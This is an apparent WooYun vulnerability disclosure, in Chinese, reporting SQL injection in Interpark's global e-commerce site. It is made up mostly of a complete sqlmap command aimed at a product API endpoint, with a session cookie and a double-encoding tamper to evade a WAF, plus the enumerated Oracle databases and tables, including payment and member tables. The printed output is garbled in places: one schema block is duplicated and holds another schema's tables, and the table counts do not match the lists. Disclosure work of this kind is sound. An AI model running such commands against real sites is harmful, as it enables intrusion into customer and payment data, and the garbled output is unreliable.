当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0204435

漏洞标题:韩国本土最大电商linterpark全球站/主站存在sql注入/9库/大量表/双编码/有waf/可union

相关厂商:globalinterpark.com

漏洞作者: hear7v

提交时间:2016-05-04 17:08

修复时间:2016-06-20 17:40

公开时间:2016-06-20 17:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

下午提交但是一直没出数据,对流量分析后发现原流量双编码,tamper之后出了数据,韩国人的数据库名不熟悉,没有具体探测数据

详细说明:

python sqlmap.py -u "http://**.**.**.**/product/Api.do?_method=getNewOption&callback=jQuery111106387168327488439_1462148731058&PRD_NO=4020676593&OPT_TP=01&OPT_NM1=%25EC%2584%25A0%25ED%2583%259D1&_=1462148731059" --user-agent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36" --cookie "wingState=visible; ipzone=HK; city=Central District; CURRENCY=cny; lang=zh_CN; tiemzone=9; _gat=1; IPCODE=003; interparkstamp_global=1308199864190577841264109964981971; LANGUAGE=zh-cn; igfsTodayViewPrdNo=4020676593; igfsTodayViewImg=/goods_image/6/5/9/3/4020676593i.jpg; igfsTodayViewAge=0; JSESSIONID=lQ5uADDlvsvop1Ps44WS73oeA64Aa2wJzaVuUkIhdyMWIr33QJf7GbO15oUWqUfW; _ga=GA1.2.449814888.1462148585" --time-sec=3 --tamper chardoubleencode.py

漏洞证明:

[21:48:42] [DEBUG] performed 0 queries in 0.02 seconds
available databases [9]:
[*] ADM
[*] APEX_030200
[*] CBT
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] SYS
[*] SYSTEM
[*] XDB
[21:48:42] [INFO] fetching tables for databases: 'ADM, APEX_030200, CBT, CTXSYS, EXFSYS, MDSYS, SYS, SYSTEM, XDB'
[21:48:42] [DEBUG] performed 0 queries in 0.12 seconds
Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND |
+--------------------------------+
Database: XDB
[2 tables]
+--------------------------------+
| XDB$IMPORT_TT_INFO |
| XDB$XIDX_IMP_T |
+--------------------------------+
Database: APEX_030200
[3 tables]
+--------------------------------+
| WWV_FLOW_DUAL100 |
| WWV_FLOW_LOV_TEMP |
| WWV_FLOW_TEMP_TABLE |
+--------------------------------+
Database: SYSTEM
[4 tables]
+--------------------------------+
| HELP |
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+
Database: SYS
[26 tables]
+--------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| DATA_PUMP_XPL_TABLE$ |
| HS$_PARALLEL_METADATA |
| HS_BULKLOAD_VIEW_OBJ |
| HS_PARTITION_COL_NAME |
| HS_PARTITION_COL_TYPE |
| IMPDP_STATS |
| KU$NOEXP_TAB |
| KU$XKTFBUE |
| KU$_DATAPUMP_MASTER_10_1 |
| KU$_DATAPUMP_MASTER_11_1 |
| KU$_DATAPUMP_MASTER_11_1_0_7 |
| KU$_DATAPUMP_MASTER_11_2 |
| KU$_LIST_FILTER_TEMP |
| KU$_LIST_FILTER_TEMP_2 |
| ODCI_PMO_ROWIDS$ |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| PLAN_TABLE$ |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
| WRI$_ADV_ASA_RECO_DATA |
| WRR$_REPLAY_CALL_FILTER |
+--------------------------------+
Database: MDSYS
[35 tables]
+--------------------------------+
| NTV2_XML_DATA |
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES |
| SDO_COORD_AXIS_NAMES |
| SDO_COORD_OPS |
| SDO_COORD_OP_METHODS |
| SDO_COORD_OP_PARAMS |
| SDO_FEATURE_USAGE |
| SDO_PREFERRED_OPS_SYSTEM |
| SDO_PREFERRED_OPS_USER |
| SDO_PRIME_MERIDIANS |
| SDO_PROJECTIONS_OLD_SNAPSHOT |
| SDO_ST_TOLERANCE |
| SDO_TOPO_DATA$ |
| SDO_TOPO_RELATION_DATA |
| SDO_TOPO_TRANSACT_DATA |
| SDO_TXN_IDX_DELETES |
| SDO_TXN_IDX_EXP_UPD_RGN |
| SDO_TXN_IDX_INSERTS |
| SDO_UNITS_OF_MEASURE |
| SDO_XML_SCHEMAS |
| SRSNAMESPACE_TABLE |
+--------------------------------+
Database: CBT
[5 tables]
+--------------------------------+
| PLAN_TABLE |
| TEMP_CBT |
| TMP_GLOBAL_LOGIN_CNT_20150226 |
| TMP_GLOBAL_LOGIN_CNT_20150522 |
| TRACE |
+--------------------------------+
Database: ADM
[166 tables]
+--------------------------------+
| BANNER_CONTENT |
| BANNER_GROUP_MASTER |
| BANNER_GROUP_MEMBER |
| BANNER_ITEM |
| BANNER_ITEM_HTML |
| BEST_USED_WRITTEN |
| BEST_USED_WRITTEN_ADMIN |
| BOARD |
| BOARD_DTL |
| B_WORK1 |
| B_WORK2 |
| CARD_PAYMENT |
| CARD_PAYMENT_HIS |
| CART |
| CATEGORY_ADDINFO_MGT |
| CBT_CONTB_PROFIT_CODE |
| CBT_TRANS_INFO |
| CLM_REQUEST |
| CLM_REQUESTDTL |
| CODE_DETAIL |
| CODE_MASTER |
| CONTENT_RECOMMEND |
| CONTENT_REPORT |
| COPY_T |
| COUNTRY_MAP |
| COUPON |
| COUPON_CBT_COND |
| COUPON_CBT_PBLCT |
| COUPON_EXCEPT_PRD |
| COUPON_RANDOM |
| D2D_PRODUCT_PARCEL_TAX |
| D2D_WEIGHT_SHIPPING_FEE |
| DELVWH_ORDER |
| DISPLAY_MENU |
| ENTR_ANTI_MEMBER |
| EVENT |
| EVENT_FREECODE |
| EXCHANGE_RATE |
| EX_ORDER_INFO |
| FAQ |
| FAQ_DTL |
| FAVORITE_ENTR |
| FREECODE_EVENT |
| FREEDELV_EXCEPTION |
| IGS_MENU |
| IGS_MENU_AUTH |
| IGS_USER |
| IGS_USER_AUTHORITY |
| IGS_USER_GROUP |
| IGS_USER_GROUP_AUTH |
| ILS_DELVWH_ORDER |
| ILS_DELVWH_ORDERPRD |
| ILS_DELV_INVOICE |
| ILS_ORD_UPDPROC |
| ILS_RTN_PRD |
| INICIS_PAY_INFO |
| INPAK_DLV_INF |
| INQUIRY |
| INQUIRY_REPLY |
| IPP_MALL_INFO |
| IPP_MALL_TRACE |
| IPP_VISIT_DDSUM |
| LANGCODE_TAG |
| LANGCODE_TAG2VALUE |
| LANGCODE_VALUE |
| LOG |
| LOGIN_SESSION |
| MAIL_SEND_HISTORY |
| MD_ORDERDTL_BUYCONFIRM |
| MEMBER_GLOBAL |
| MEMBER_GLOBAL_TEMP |
| MENU |
| MILEAGE_UNAVAILABLE |
| ORDERCLM |
| ORDERCLMDTL |
| ORDERCLMDTL_DISCOUNT |
| ORDERCLMDTL_ENTR |
| ORDERCLMDTL_STATUS_HIS |
| ORDERCLMDTL_STORE |
| ORDERCLM_ACCESS_INFO |
| ORDERCLM_CRTTP_PRCS |
| ORDERCLM_DELV |
| ORDERCLM_DELVAMT |
| ORDERCLM_DELV_COUPON |
| ORDERCLM_DELV_PLACE |
| ORDERCLM_DELV_PLACE_BASIC |
| ORDERCLM_DELV_WEIGHT |
| ORDERCLM_EOD |
| ORDERCLM_EXCEPTION |
| ORDERCLM_MISS_DELV |
| ORDERCLM_PRODUCT_HIS |
| ORDERCLM_STATUS_HIS |
| ORDER_RELEASE_LIMIT |
| ORDPAYMENT_REFUND |
| ORDPAYMENT_REFUND_DTL |
| RESTAPI_MALL_INFO |
| RESTAPI_PRODUCT_SET |
| RESTAPI_WHITE_LIST |
| REVIEW_SCRAP |
| REV_CARD_PAYMENT_DDSUM |
| REV_DELVAMT_DDSUM |
| REV_DIFF_HST |
| REV_DIFF_RSN |
| REV_EXT_DDSUM |
| REV_IPOINT_DDSUM |
| REV_ORDCLMDTL_ORG_SUM |
| REV_ORDCLMDTL_SUM |
| REV_ORDCLM_EXPENSE_SUM |
| REV_ORDPAYMENT_REFUND_SUM |
| REV_PAY_LOG |
| REV_PRCS_HST |
| REV_SETL_DELVAMT_LOG |
| REV_SETL_PRD_LOG_CBT |
| ROULETTE_ACC_HIS |
| ROULETTE_RANK |
| ROULETTE_RANK_TP |
| SERVICE_USED_WRITTEN |
| SERVICE_USED_WRITTEN_DTL |
| TEMP_PRODUCT_KTY2 |
| TENPAY_PAYMENT |
| TENPAY_PAYMENT_AUTH |
| TENPAY_PAYMENT_HIS |
| TMP_CLAIM |
| TMP_T_IP_CITY |
| TMP_T_LOCATION |
| TOAD_PLAN_TABLE |
| TRULY_COMMENT |
| TRUNCATE_TAB_LIST |
| TRY_CBT_TRANS_INFO |
| TRY_ORD |
| TRY_ORDDELV_PLACE |
| TRY_ORDDTL_DISCOUNT |
| TRY_ORD_DELVAMT |
| TRY_ORD_DELV_COUPON |
| TRY_ORD_DTL |
| TRY_PAYMENT |
| TTT |
| T_IP_CITY |
| T_LOCATION |
| USED_WRITTEN_ADDINFO |
| USED_WRITTEN_MEMBER_01 |
| USED_WRITTEN_PRODUCT_01 |
| USED_WRITTEN_REPLY |
| WORK_CALENDAR |
| ZZIM_CNT |
| ZZIM_LIST |
+--------------------------------+
Database: CTXSYS
[5 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
| TRY_ORD_DELVAMT |
| TRY_ORD_DELV_COUPON |
| TRY_ORD_DTL |
| TRY_PAYMENT |
| TTT |
| T_IP_CITY |
| T_LOCATION |
| USED_WRITTEN_ADDINFO |
| USED_WRITTEN_MEMBER_01 |
| USED_WRITTEN_PRODUCT_01 |
| USED_WRITTEN_REPLY |
| WORK_CALENDAR |
| ZZIM_CNT |
| ZZIM_LIST |
+--------------------------------+
Database: CTXSYS
[5 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
| DR$THS |
| DR$THS_PHRASE |
+--------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 hear7v@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-05-06 17:38

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向KRCERT组织通报,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-04 17:23 | mango ( 核心白帽子 | Rank:2145 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    沙发

  2. 2016-05-05 16:24 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

    @mango memeda

  3. 2016-05-07 16:09 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

    @xsser 请问下这个能申请证书么,感觉,好低啊